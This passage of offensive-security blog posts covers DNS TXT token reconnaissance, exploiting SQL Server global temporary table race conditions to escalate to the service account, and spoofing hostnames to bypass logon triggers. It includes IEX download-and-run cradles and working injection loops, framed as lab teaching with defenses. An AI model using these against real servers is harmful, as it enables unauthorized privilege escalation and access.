# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results
For those of you that don't like staring at the console, the results can also be viewed using Out-GridView.
# View record in the out-grid view
$Results | Out-GridView
Finally, the command also automatically creates two CSV files that contain the results:
  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could be fingerprinted.

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we've used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA: This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company's Active Directory deployment. In many cases they aren't configured with multi-factor authentication (MFA). Common examples include Office 365, AWS, G Suite, and GitHub. Pro Tip: Once you've authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names. You can do that with Karl's Get-AzureDomainInfo.ps1 script.
  2. Subdomain Hijacking Targets: The domain validation tokens could reveal services that support subdomains, which can be attacked once the CNAME records go stale. For information on common techniques, Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel: Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity: When reviewing domain validation tokens for all of the domains owned by an organization it's possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:
    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they use 3rd party marketing and analytics? If so, who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certificates? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example:
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest, or internal audit. Good luck and hack responsibly!

Exploiting SQL Server Global Temporary Table Race Conditions

SQL Server global temporary tables usually aren't an area of focus during network and application penetration tests. However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users. In this blog, I'll walk through how global temporary tables work, and share some techniques that we've used to identify and exploit them in real applications. If you don't want to read through everything you can jump ahead.

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';

What are Global Temporary Tables?

There are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I've seen, there are three types of temporary tables commonly used by developers: table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user. As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables. All of the temporary tables are stored in the tempdb database and can be listed using the query below.
SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';
All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on the table type and scope. Below is a summary of the scope for each type of temporary table:
  • Table variables: accessible only within the current query batch of the current session
  • Local temporary tables (#): accessible across batches, but only within the session that created them
  • Global temporary tables (##): accessible to all active sessions
With that foundation in place, let's walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users. Below is an example of referencing a table variable in the same batch.
-- Create table variable
If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable')
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO
We can see from the image above that we are able to query the table variable within the same query batch. However, when we separate the table creation and the data selection into two batches using "GO", the table variable is no longer accessible outside of its original batch. Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they're stored. When you create a table variable it's stored in tempdb using a name starting with a "#" followed by randomly generated characters. The query below can be used to filter for table variables being used.
SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.
-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO
As you can see from the image above, the table data can still be accessed across multiple query batches. Similar to table variables, all custom local temporary table names need to start with a "#". Other than that, you can name them whatever you want. They are also stored in the tempdb database, but SQL Server will append some additional information to the end of your table name so access can be constrained to your session. Let's see what our new table "#LocalTempTbl" looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1
Above we can see that the table we created named "#LocalTempTbl" had some additional session information appended to it. All users can see that temp table name, but only the session that created it can access its contents. It appears that the session id appended to the end increments with each new session made to the server, and you can actually use the full name to query the table from within your session. Below is an example.
SELECT * 
FROM tempdb..[#LocalTempTbl_______________________________________________________________________________________________________000000000007]
However, if you attempt to access that temp table from another user's session you get the following error. Regardless, when you're all done with the local temporary table it can be removed by terminating your session or explicitly dropping it using the example command below.
DROP TABLE #LocalTempTbl

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables you can create and access global temporary tables from separate batched queries. The big difference is that ALL active user sessions can view and modify global temporary tables.  Let’s take a look at a basic example below.
-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO
Above we can see that we are able to query the global temporary table across different query batches. All custom global temporary table names need to start with "##". Other than that, you can name them whatever you want. They are also stored in the tempdb database. Let's see what our new table "##GlobalTempTbl" looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1
You can see that SQL Server doesn't append any session related data to the table name like it does with local temporary tables, because it's intended to be used by all sessions. Let's sign into another session using the "basicuser" login we created to show that's possible. As you can see, if that global temporary table contains sensitive data it's now exposed to all of the SQL Server users.
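For example, a least privilege user could dump the table with a single PowerUpSQL query. Below is a quick sketch using the "basicuser" login from the lab setup (the instance name is a placeholder):
# Read the global temp table as the least privilege "basicuser" login
Get-SQLQuery -Verbose -Instance "MSSQLSRV04\SQLSERVER2014" -Username basicuser -Password 'Password123!' -Query 'SELECT * FROM ##GlobalTempTbl'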

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target Global Temp Tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried.  So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables.
  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you're logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, stored procedures, functions, and triggers for each database. You should be able to filter the query results for the string "##" to identify global temporary table usage in the TSQL. With the filtered list in hand, you should be able to review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack. To get you started, a rough example query is sketched after the list below. It's worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:
  • Get-SQLAgentJob
  • Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml
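If you'd rather run the search ad hoc, the rough sketch below shows one way to hunt for "##" in object definitions and agent job steps using Get-SQLQuery (the instance name is a placeholder, and both queries assume privileged access):
# Flag global temp table usage in stored procedures, functions, and triggers
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Query "
SELECT OBJECT_NAME(object_id) AS object_name, definition
FROM sys.sql_modules
WHERE definition LIKE '%##%'"

# Flag global temp table usage in agent job steps (requires rights to msdb)
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Query "
SELECT j.name AS job_name, s.step_name, s.command
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON j.job_id = s.job_id
WHERE s.command LIKE '%##%'"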
It would be nice if we could always just view the source code, but the reality is that most attackers won't have sysadmin privileges out of the gate. So, when you find yourself in that position it's time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.
-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
If you didn't DROP "##GlobalTempTbl", then you should see something similar to the results below when you execute the query. Running the query above provides insight into the global temporary tables being used at that moment, but it doesn't help us monitor for their use over time. Remember, temporary tables are commonly only used for a short period of time, so you don't want to miss them. The query below is a variation of the first query, but it will provide a list of global temporary tables every second. The delay can be changed by modifying the "WAITFOR" statement, but be careful not to overwhelm the server. If you're not sure what you're doing, this technique should only be practiced in non-production environments.
-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
    JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
    WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

    -- Set delay
    WaitFor Delay '00:00:01'
END
As you can see, the query will provide a list of table names and columns that we can use in future attacks, but we may also want to monitor the contents of the global temporary tables to understand what our options are. Below is an example, but remember to use "WAITFOR" to throttle your monitoring when possible.
-- Monitor contents of all Global Temp Tables 
-- Loop
WHILE 1=1
BEGIN
    -- Add delay if required
    WAITFOR DELAY '0:0:1'
    
    -- Setup variables
    DECLARE @mytempname varchar(max)
    DECLARE @psmyscript varchar(max)

    -- Iterate through all global temp tables 
    DECLARE MY_CURSOR CURSOR 
        FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
    OPEN MY_CURSOR
    FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    WHILE @@FETCH_STATUS = 0
    BEGIN 

        -- Print table name
        PRINT @mytempname 

        -- Select table contents
        DECLARE @myname varchar(max)
        SET @myname = 'SELECT * FROM [' + @mytempname + ']'
        EXEC(@myname)

        -- Next record
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
    END
    CLOSE MY_CURSOR
    DEALLOCATE MY_CURSOR
END
As you can see, the query above will monitor for global temp tables and display their contents. That technique is a great way to blindly dump potentially sensitive information from global temporary tables, even if they only exist for a moment. However, sometimes you may want to modify the contents of the global temp tables too. We already know the table and column names, so it's pretty straightforward to monitor for global temp tables being created and update their contents. Below is an example.
-- Loop forever
WHILE 1=1 
BEGIN    
    -- Select table contents
    SELECT * FROM ##GlobalTempTbl

    -- Update global temp table contents
    DECLARE @mycommand varchar(max)
    SET @mycommand = 'UPDATE t1 SET t1.SpyName = ''Inspector Gadget'' FROM ##GlobalTempTbl  t1'        
    EXEC(@mycommand)    
END
As you can see, the table was updated. However, you might still be wondering, "Why would I want to change the contents of the temp table?" To help illustrate the value of the technique I've put together a short case study in the next section.

Case Study: Attacking a Vulnerable Agent Job

Now for some real fun.  Below we’ll walk through the vulnerable agent job’s TSQL code and I’ll highlight where the global temporary tables are being used insecurely.  Then we’ll exploit the flaw using the previously discussed techniques. To get things started, download and run this TSQL script as a sysadmin to configure the vulnerable agent jobs on the SQL Server instance.

Vulnerable Agent Job Walkthrough

The agent will execute the TSQL job every minute and perform the following process:
  1. The job generates an output file path for the PowerShell script that will be executed later.
    -- Set filename for PowerShell script
    Set @PsFileName = ''MyPowerShellScript.ps1''
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY(''ErrorLogFileName'')) as VARCHAR(MAX)),''ERRORLOG'','''')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
  2. The job creates a string variable called "@MyPowerShellCode" to store the PowerShell script. The PowerShell code simply creates the file "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\intendedoutput.txt", which contains the string "hello world".
    -- Define the PowerShell code
    SET @MyPowerShellCode = ''Write-Output "hello world" | Out-File "'' +  @TargetDirectory + ''intendedoutput.txt"''
    Pro Tip: The SQL Server and agent service accounts always have write access to the log folder of the SQL Server installation. Sometimes it can come in handy during offensive operations. You can find the log folder with the query below:
    SELECT SERVERPROPERTY('InstanceDefaultLogPath')
  3. The “@MyPowerShellCode” variable that contains the PowerShell code is then inserted into a randomly named Global Temporary Table. This is where it all starts to go wrong for the developer, because the second that table is created any user can view and modify it.
    -- Create a global temp table with a unique name using dynamic SQL 
    SELECT  @MyGlobalTempTable =  ''##temp'' + CONVERT(VARCHAR(12), CONVERT(INT, RAND() * 1000000))
    
    -- Create a command to insert the PowerShell code stored in the @MyPowerShellCode variable, into the global temp table
    SELECT  @Command = ''
            CREATE TABLE ['' + @MyGlobalTempTable + ''](MyID int identity(1,1), PsCode varchar(MAX)) 
            INSERT INTO  ['' + @MyGlobalTempTable + ''](PsCode) 
            SELECT @MyPowerShellCode''
    
    -- Execute that command 
    EXECUTE sp_ExecuteSQL @command, N''@MyPowerShellCode varchar(MAX)'', @MyPowerShellCode
  4. Xp_cmdshell is then used to execute bcp on the operating system. Bcp is the bulk copy utility that ships with SQL Server. In this case, it's being used to connect to the SQL Server instance as the SQL Server service account, select the PowerShell code from the global temporary table, and write the PowerShell code to the file path defined in step 1.
    -- Execute bcp via xp_cmdshell (as the service account) to save the contents of the temp table to MyPowerShellScript.ps1
    SELECT @Command = ''bcp "SELECT PsCode from ['' + @MyGlobalTempTable + '']'' + ''" queryout "''+ @PsFilePath + ''" -c -T -S '' + @@SERVERNAME
    -- Write the file
    EXECUTE MASTER..xp_cmdshell @command, NO_OUTPUT
  5. Next, xp_cmdshell is used again to execute the PowerShell script that was just written to disk.
    -- Run the PowerShell script
    DECLARE @runcmdps nvarchar(4000)
    SET @runcmdps = ''Powershell -C "$x = gc ''''''+ @PsFilePath + '''''';iex($X)"''
    EXECUTE MASTER..xp_cmdshell @runcmdps, NO_OUTPUT
  6. Finally, xp_cmdshell is used one last time to remove the PowerShell script.
    -- Delete the PowerShell script
    DECLARE @runcmddel nvarchar(4000)
    SET @runcmddel= ''DEL /Q "'' + @PsFilePath +''"''
    EXECUTE MASTER..xp_cmdshell @runcmddel, NO_OUTPUT

Vulnerable Agent Job Attack

Now that our vulnerable agent job is running in the background, let’s log in using our least privilege user “basicuser” to conduct our attack. Below is a summary of the attack.
  1. First, let's see if we can discover the global temporary table name using our monitoring query from earlier. This monitoring script is throttled. I do not recommend removing the throttle in production; it tends to consume a lot of CPU, and that will set off alarms, because DBAs tend to monitor the performance of their production servers pretty closely. You're much more likely to get caught causing 80% utilization on the server than you are when executing xp_cmdshell.
    -- Loop
    While 1=1
    BEGIN
        SELECT t1.name as 'Table_Name',
               t2.name as 'Column_Name',
               t3.name as 'Column_Type',
               t1.create_date,
               t1.modify_date,
               t1.parent_object_id       
        FROM tempdb.sys.objects AS t1
        JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
        JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
        WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
    
        -- Set delay
        WAITFOR DELAY '00:00:01'
    END
    The job takes a minute to run, so you may have to wait up to 59 seconds (or you can manually execute the job in the lab), but eventually you should see something similar to the output below.
  2. In this example, the table name "##temp800845" looks random, so we try monitoring again and get the table name "##103919". It has a different name, but the same columns. That's enough information to get us moving in the right direction.
  3. Next, we want to take a look at the contents of the global temporary table before it gets removed. However, we don’t know what the table name will be.  To work around that constraint, the query below will display the contents of every global temporary table.
    -- Monitor contents of all Global Temp Tables 
    -- Loop
    While 1=1
    BEGIN
        -- Add delay if required
        WAITFOR DELAY '00:00:01'
        
        -- Setup variables
        DECLARE @mytempname varchar(max)
        DECLARE @psmyscript varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN 
    
            -- Print table name
            PRINT @mytempname 
    
            -- Select table contents
            DECLARE @myname varchar(max)
            SET @myname = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@myname)
    
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END
    From here we can see that the global temporary table is actually housing PowerShell code. From that, we can guess that it's being executed at some point down the line. So, the next step is to modify the PowerShell code before it gets executed.
  4. Once again, we don't know what the table name is going to be, but we do know the column names. So we can modify our query from step 3 and UPDATE the contents of the global temporary table rather than simply selecting its contents. In this case, we'll be changing the output path defined in the code from "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\intendedoutput.txt" to "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt". However, you could replace the code with your favorite PowerShell shellcode runner or whatever arbitrary commands bring sunshine into your day.
    -- Create variables
    DECLARE @PsFileName NVARCHAR(4000)
    DECLARE @TargetDirectory NVARCHAR(4000)
    DECLARE @PsFilePath NVARCHAR(4000)
    
    -- Set filename for PowerShell script
    Set @PsFileName = 'finishline.txt'
    
    -- Set target directory for PowerShell script to be written to
    SELECT  @TargetDirectory = REPLACE(CAST((SELECT SERVERPROPERTY('ErrorLogFileName')) as VARCHAR(MAX)),'ERRORLOG','')
    
    -- Create full output path for creating the PowerShell script 
    SELECT @PsFilePath = @TargetDirectory +  @PsFileName
    
    -- Loop forever 
    WHILE 1=1 
    BEGIN    
        -- Set delay
        WAITFOR DELAY '0:0:1'
    
        -- Setup variables
        DECLARE @mytempname varchar(max)
    
        -- Iterate through all global temp tables 
        DECLARE MY_CURSOR CURSOR 
            FOR SELECT name FROM tempdb.sys.tables WHERE name LIKE '##%'
        OPEN MY_CURSOR
        FETCH NEXT FROM MY_CURSOR INTO @mytempname 
        WHILE @@FETCH_STATUS = 0
        BEGIN         
            -- Print table name
            PRINT @mytempname 
        
            -- Update contents of known column with ps script in an unknown temp table    
            DECLARE @mycommand varchar(max)
            SET @mycommand = 'UPDATE t1 SET t1.PSCode = ''Write-Output "hello world" | Out-File "' + @PsFilePath + '"'' FROM ' + @mytempname + '  t1'
            EXEC(@mycommand)    
    
            -- Select table contents
            DECLARE @mycommand2 varchar(max)
            SET @mycommand2 = 'SELECT * FROM [' + @mytempname + ']'
            EXEC(@mycommand2)
        
            -- Next record
            FETCH NEXT FROM MY_CURSOR INTO @mytempname  
        END
        CLOSE MY_CURSOR
        DEALLOCATE MY_CURSOR
    END
    As you can see from the screenshot above, we were able to update the temporary table contents with our custom PowerShell code. To confirm that we beat the race condition, verify that the "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLSERVER2014\MSSQL\Log\finishline.txt" file was created. Note: Your path may be different if you're using a different version of SQL Server.
Tada! In summary, we leveraged the insecure use of global temporary tables in a TSQL agent job to escalate privileges from a least privilege SQL Server login to the Windows operating system account running the SQL Server agent service.

What can I do about it?

Below are some basic recommendations based on a little research, but please reach out if you have any thoughts.  I would love to hear how other folks are tackling this one.

Prevention

  1. Don’t run code blocks that have been stored in a global temporary table.
  2. Don’t store sensitive data or code blocks in a global temporary table.
  3. If you need to access data across multiple sessions consider using memory-optimized tables. Based on my lab testing, they can provide similar performance benefits without having to expose data to unprivileged users. For more information check out this article from Microsoft; a minimal setup sketch follows this list.
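Below is a minimal sketch of that alternative. The database name (MyAppDb), filegroup, file name, path, instance name, and bucket count are all placeholders you'd adjust for your installation:
# One-time setup: add a memory-optimized filegroup and container to the database
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Query "
ALTER DATABASE MyAppDb ADD FILEGROUP imoltp_fg CONTAINS MEMORY_OPTIMIZED_DATA;
ALTER DATABASE MyAppDb ADD FILE (NAME='imoltp_file', FILENAME='C:\Data\imoltp_file') TO FILEGROUP imoltp_fg;"

# Create a non-durable memory-optimized table; unlike a ## table,
# normal database permissions apply, so least privilege logins can't read it
Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -Query "
USE MyAppDb;
CREATE TABLE dbo.SessionData
(
    Spy_id  INT NOT NULL PRIMARY KEY NONCLUSTERED HASH WITH (BUCKET_COUNT = 1024),
    SpyName VARCHAR(100) NOT NULL
)
WITH (MEMORY_OPTIMIZED = ON, DURABILITY = SCHEMA_ONLY);"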

Detection

At the moment, I don’t have a great way to monitor for potentially malicious global temporary table access.  However, if an attacker is monitoring global temporary tables too aggressively the CPU should spike and you’ll likely see their activity in the list of expensive queries.  From there, you should be able to track down the offending user using the session_id and a query similar to:
SELECT 
    status,
    session_id,
    login_time,
    last_request_start_time,
    security_id,
    login_name,
    original_login_name
FROM [sys].[dm_exec_sessions]

Wrap Up

In summary, using global temporary tables can result in race conditions that are exploitable by least privilege users to read and modify the associated data. Depending on how that data is being used, it can have some pretty big security implications. Hopefully the information is useful to the builders and breakers out there trying to make things better. Either way, have fun and hack responsibly.

Bypassing SQL Server Logon Trigger Restrictions

It's pretty common for us to perform application penetration testing against two-tier desktop applications that connect directly to SQL Server databases. Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I'll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties. The examples will include SSMS and PowerUpSQL. This should be useful to application penetration testers and developers who may have inherited a legacy desktop application. This blog has been organized into the sections below, feel free to jump ahead.

What's a Logon Trigger?

A logon trigger is essentially a stored procedure that executes after successfully authenticating to SQL Server, but before the logon session is fully established. They are commonly used to programmatically restrict access to SQL Server based on time of day, hostnames, application names, and number of concurrent sessions by a single user.

Installing SQL Server

If you don't already have SQL Server installed and want to follow along, below are a few resources to get you started.
  1. Download and install SQL Server from here.
  2. Download and install SQL Server Management Studio Express (SSMS) from here.

Creating a Logon Trigger to Restrict Hostnames

Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting workstation name.
  1. Log into your new SQL Server instance as a sysadmin using SSMS.
  2. First, let's take a look at the name of the workstation connecting to the SQL Server instance using the command below. By default, it should return the hostname of the connecting workstation.
    SELECT HOST_NAME()
  3. Create a logon trigger that only allows white listed hostnames to connect. Execute the trigger exactly as it is shown below.
    -- Create our logon trigger
    CREATE TRIGGER MyHostsOnly
    ON ALL SERVER
    FOR LOGON
    AS
    BEGIN
        IF
        (
            -- White list of allowed hostnames are defined here.
            HOST_NAME() NOT IN ('ProdBox','QaBox','DevBox','UserBox')
        )
        BEGIN
            RAISERROR('You are not allowed to login from this hostname.', 16, 1);
            ROLLBACK;
        END 
    END
  4. After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from a hostname that is not on the white list.

Spoofing Hostnames using SSMS

At this point, you might ask, "when would I (an attacker) actually use this in the real world?". Usually it's after you've recovered connection strings from configuration files or decompiled code, and now we want to use that information to connect directly to the backend SQL Server. This is a very common scenario during application penetration tests, but we also find internal applications and configuration files on open file shares during network pentests and red team engagements. Alright, let's spoof our hostname in SSMS.
  1. Open the "Connect Object Explorer" in SSMS and navigate to options -> "Additional Connection Parameters". From there you can set connection string properties on the fly (super cool). For the sake of this example, we'll set the "Workstation ID" property to "DevBox", which is a hostname we know is white listed. Note: I'll cover a few ways to identify white listed hostnames later.Img B D B Fa
  2. Press connect to login. If you open a query window and check your hostname again it should return "DevBox". This helps further illustrate that we successfully spoofed the hostname.
    SELECT HOST_NAME()

Spoofing Hostnames using Connection Strings

Under the hood, SSMS is just building a connection string with our "workstation id" property set. Below is an example of a simple connection string that will connect to a remote SQL Server instance as the current Windows user and select the "Master" database.
Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;
If the logon trigger we showed in the last section was implemented, we should see the "failed to connect" message. However, if you set the "Workstation ID" property to an allowed hostname you would be allowed to log in.
Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;Workstation ID=DevBox;
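If you want to test the same spoof outside of SSMS, the quick sketch below opens a .NET SqlClient connection from PowerShell with the "Workstation ID" property set ("server\instance1" is a placeholder, and "DevBox" is assumed to be on the trigger's white list):
# Minimal sketch: spoof the workstation name over a raw .NET SqlClient connection
$ConnString = "Data Source=server\instance1;Initial Catalog=Master;Integrated Security=True;Workstation ID=DevBox;"
$Conn = New-Object System.Data.SqlClient.SqlConnection($ConnString)
$Conn.Open()
$Cmd = $Conn.CreateCommand()
$Cmd.CommandText = "SELECT HOST_NAME()"
$Cmd.ExecuteScalar()   # Should return the spoofed name: DevBox
$Conn.Close()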

Spoofing Hostnames using PowerUpSQL

I've also added the "WorkstationId" option to the Get-SQLQuery function of PowerUpSQL. I will be working toward retrofitting the other functions once I find some more time. For now, below is an example showing how to bypass the logon trigger we created in the previous section.
  1. Open Powershell and load PowerUpSQL via your preferred method. The example below shows how to load it from GitHub directly.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
  2. The initial connection fails due to the trigger restrictions. Note that the "-ReturnError" flag needs to be set to view the error returned by the server.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "SELECT host_name()" -ReturnError
  3. Now set the workstationid option to "DevBox" and you should be able to execute the query successfully.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Query "SELECT host_name()" -WorkstationId "DevBox"
  4. To remove the trigger you can issue the command below.
    Get-SQLQuery -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -WorkstationId "DevBox" -Query 'DROP TRIGGER MyHostsOnly on all server'

Creating a Logon Trigger to Restrict Applications

Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting application name.
  1. Log into your new SQL Server instance as a sysadmin using SSMS.
  2. First, let's take a look at the name of the application connecting to the SQL Server instance using the command below. It should return "Microsoft SQL Server Management Studio – Query".
    SELECT APP_NAME()
  3. Create a logon trigger that only allows white listed applications to connect. Execute the trigger exactly as it is shown below.
    CREATE TRIGGER MyAppsOnly
    ON ALL SERVER
    FOR LOGON
    AS
    BEGIN
         IF
         (
              -- Set the white list of application names here
              APP_NAME() NOT IN ('Application1','Application2','SuperApp3000','LegacyApp','DevApp1')
         )
         BEGIN
